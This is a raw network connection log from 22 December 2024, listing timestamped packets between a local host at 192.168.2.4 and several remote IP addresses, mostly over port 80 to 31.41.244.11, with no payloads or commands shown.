Dec 22, 2024 02:16:44.032396078 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:44.032501936 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:44.032596111 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:44.036467075 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:44.036487103 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:44.040874004 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.040934086 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.041076899 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.041126013 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.044924974 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.044982910 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.045041084 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.045089960 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.051542997 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:44.051640987 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:44.051811934 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:44.051812887 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:44.053222895 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.053288937 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.056636095 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.056744099 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.056752920 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.056783915 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.065095901 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.065148115 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.065151930 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.065188885 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.073374987 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.073426962 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.073429108 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.073474884 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.081933022 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.081986904 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.081986904 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.082031965 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.090188980 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.090243101 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.090264082 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.090306997 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.098659992 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.098714113 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.098725080 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.098756075 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.106972933 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.107023001 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.107023001 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.107073069 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.115433931 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.115483999 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.115550995 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.115592957 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.122350931 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.122397900 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.122469902 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.122534990 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.129635096 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.129684925 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.146970987 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:44.147011042 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:44.147078991 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:44.147403002 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:44.147413969 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:44.232947111 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.233023882 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.233079910 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.233124971 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.235079050 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.235126972 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.235280991 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.235322952 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.239669085 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.239716053 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.239880085 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.239923000 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.244291067 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.244354010 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.244384050 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.244427919 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.248718977 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.248766899 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.248913050 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.248954058 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.253294945 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.253338099 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.253525019 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.253565073 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.257857084 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.257900000 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.258048058 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.258089066 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.262423038 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.262460947 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.262667894 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.262710094 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.266969919 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.267013073 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.267163992 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.267205000 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.271533966 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.271576881 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.271778107 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.271817923 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.276240110 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.276268005 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.276283026 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.276305914 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.280914068 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.280963898 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.280965090 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.281004906 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.285326004 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.285371065 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.285414934 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.285455942 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.289740086 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.289807081 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.289936066 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.289978981 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.294377089 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.294395924 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.294423103 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.294439077 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.298825026 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.298868895 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.299026012 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.299060106 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.303453922 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.303498983 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.303499937 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.303536892 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.308223963 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.308269024 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.308353901 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.308393002 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.312553883 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.312597036 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.312727928 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.312762976 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.317164898 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.317183018 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.317208052 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.317223072 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.321904898 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.321943998 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.321949959 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.321988106 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.326420069 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.326464891 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.326476097 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.326504946 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.330909967 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.330955982 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.330970049 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.330991983 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.335422039 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.335465908 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.335477114 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.335515022 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.403659105 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:44.403691053 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:44.424961090 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.425013065 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.425165892 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.425206900 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.426770926 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.426811934 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.426868916 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.426953077 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.429541111 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.429625034 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.429666996 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.429706097 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.433149099 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.433195114 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.433197975 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.433233976 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.436851978 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.436871052 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.436893940 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.436908960 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.440135956 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.440175056 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.440284014 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.440320969 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.443485022 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.443546057 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.443600893 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.443639040 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.446958065 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.446985006 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.447009087 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.447021961 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.450304985 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.450333118 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.450359106 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.450376987 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.453509092 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.453558922 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.453593016 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.453636885 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.456535101 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.456583023 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.456613064 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.456653118 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.459857941 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.459891081 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.459959984 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.460001945 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.462788105 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.462822914 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.463040113 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.463080883 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.465912104 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.465958118 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.465958118 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.466001034 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.468902111 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.468971968 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.468986988 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.469027042 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.471981049 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.472028971 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.472054958 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.472098112 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.475339890 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.475394011 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.475404024 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.475447893 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.478013039 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.478068113 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.478069067 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.478111982 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.481049061 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.481106043 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.481106997 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.481153011 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.484014988 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.484069109 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.484071970 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.484110117 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.487121105 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.487171888 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.487175941 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.487212896 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.489849091 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.489898920 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.490066051 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.490111113 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.493117094 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.493170977 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.493211031 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.493254900 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.496269941 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.496325970 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.496328115 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.496366024 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.498748064 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.498799086 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.498872042 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.498917103 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.501997948 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.502054930 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.502095938 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.502147913 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.504975080 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.505031109 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.505070925 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.505115032 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.507961988 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.508018017 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.508138895 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.508227110 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.510853052 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.510895967 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.510940075 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.510986090 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.514101028 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.514156103 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.514158010 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.514194965 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.517026901 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.517082930 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.517173052 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.517213106 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.519773006 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.519817114 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.520289898 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.520343065 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.522749901 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.522795916 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.522861004 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.522902012 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.525959969 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.526029110 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.526052952 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.526094913 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.528853893 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.528927088 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.529242992 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.529298067 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.530009031 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:44.530038118 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:44.530102968 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:44.530380011 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:44.530396938 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:44.531748056 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.531800032 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.531841040 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.531889915 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.534678936 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.534729958 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.617424011 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.617477894 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.617496967 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.617525101 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.618143082 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.618200064 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.618570089 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.618622065 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.618690968 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.618736982 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.620942116 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.621059895 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.621062994 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.621104956 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.623279095 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.623333931 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.623394012 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.623441935 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.625571966 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.625626087 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.625709057 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.625756979 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.627836943 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.627893925 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.627934933 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.627981901 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.630363941 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.630419970 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.630429029 CET	49851	80	192.168.2.4	31.41.244.11
